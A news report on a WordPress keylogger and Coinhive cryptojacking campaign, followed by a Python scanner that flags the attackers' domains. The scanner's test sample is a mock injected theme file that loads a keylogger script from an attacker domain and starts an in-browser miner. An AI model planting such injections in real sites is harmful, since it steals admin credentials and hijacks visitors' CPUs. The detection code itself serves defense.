Security researchers have discovered over 2,000 WordPress sites —possibly more— infected with a keylogger that's being loaded on the WordPress backend login page and a cryptojacking script (in-browser cryptocurrency miner) on their frontends.
Researchers have tied these newly discovered infected sites to a similar operation that took place in early December 2017.
The attack is quite simple. Miscreants find unsecured WordPress sites —usually running older WordPress versions or older themes and plugins— and use exploits for those sites to inject malicious code into the CMS' source code.
The malicious code includes two parts. For the admin login page, the code loads a keylogger hosted on a third-party domain. For the site's frontend, crooks load the Coinhive in-browser miner and mine Monero using the CPUs of people visiting the site.
For the late-2017 campaign, crooks loaded their keylogger from the "cloudflare.solutions" domain. Those attacks affected nearly 5,500 WordPress sites but were stopped on December 8 when the registrar took down the miscreants' domain.
According to a new report released yesterday by Sucuri, the company that has been tracking this campaign since April 2017, crooks are now loading the keylogger from three new domains: cdjs.online, cdns.ws, and msdns.online.
Sucuri fears that not all affected sites are being indexed in PublicWWW and that the number of victims could be even bigger.
WordPress website owners are advised to review their sites, update anything that needs updating, and check whether suspicious scripts are being loaded on their login page.
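One way to act on that advice is to sweep the WordPress install for files that reference the domains named in the article. The following is an added example, not code from the article or from Sucuri: it walks a directory tree, reads PHP/JS/HTML files line by line and flags any line that references the keylogger domains (cloudflare.solutions, cdjs.online, cdns.ws, msdns.online) or the Coinhive miner. The domain list is taken from the article; the `CoinHive.Anonymous` / `coinhive.min.js` patterns are what the Coinhive library was loaded and invoked as. The sample `functions.php` content, its script paths and the site key are constructed placeholders, and the scan covers files only, not the database.

```python
import os
import re
import tempfile

# Indicators from the article: the keylogger domains of the December 2017 wave
# and the new wave, plus the Coinhive miner's own host.
KNOWN_BAD_HOSTS = (
    "cloudflare.solutions",
    "cdjs.online",
    "cdns.ws",
    "msdns.online",
    "coinhive.com",
)

# How the Coinhive library was typically referenced and started from a page.
MINER_PATTERNS = (
    re.compile(r"coinhive\.min\.js", re.I),
    re.compile(r"CoinHive\.Anonymous", re.I),
)


def scan_text(text, origin="<text>"):
    """Return (origin, line_no, reason, snippet) for every suspicious line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        lowered = line.lower()
        for host in KNOWN_BAD_HOSTS:
            if host in lowered:
                findings.append((origin, line_no, f"reference to {host}", line.strip()))
                break
        else:
            # No known host on this line; still catch the miner invocation itself.
            for pat in MINER_PATTERNS:
                if pat.search(line):
                    findings.append((origin, line_no, "Coinhive miner invocation", line.strip()))
                    break
    return findings


def scan_tree(root, extensions=(".php", ".js", ".html")):
    """Scan every file under root with one of the given extensions."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), origin=path))
            except OSError:
                continue  # unreadable file; report separately if needed
    return findings


# Constructed sample of an injected theme file (placeholder paths and key),
# not material from the article: one injection on the login page, one miner
# on the public frontend, matching the two-part scheme the article describes.
SAMPLE_FUNCTIONS_PHP = """<?php
add_action('login_enqueue_scripts', 'theme_login_scripts');
function theme_login_scripts() {
    echo '<script src="https://cdjs.online/PLACEHOLDER.js"></script>';
}
function theme_footer_scripts() {
    echo '<script src="https://coinhive.com/lib/coinhive.min.js"></script>';
    echo '<script>var m = new CoinHive.Anonymous("PLACEHOLDER_KEY"); m.start();</script>';
}
"""


def demo():
    """Write the sample into a temporary wp-content tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme_dir = os.path.join(root, "wp-content", "themes", "sample-theme")
        os.makedirs(theme_dir)
        with open(os.path.join(theme_dir, "functions.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_FUNCTIONS_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    for origin, line_no, reason, snippet in demo():
        print(f"{origin}:{line_no}: {reason}\n    {snippet}")
```

Run it against the web root of a real install (`scan_tree("/var/www/html")`) and review each hit by hand; a match is a starting point for cleanup, not proof on its own, and the same strings can also hide in database-stored widgets or options that this file scan does not cover.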
It was only in December when this group moved to the more devious practice of collecting admin credentials via a keylogger.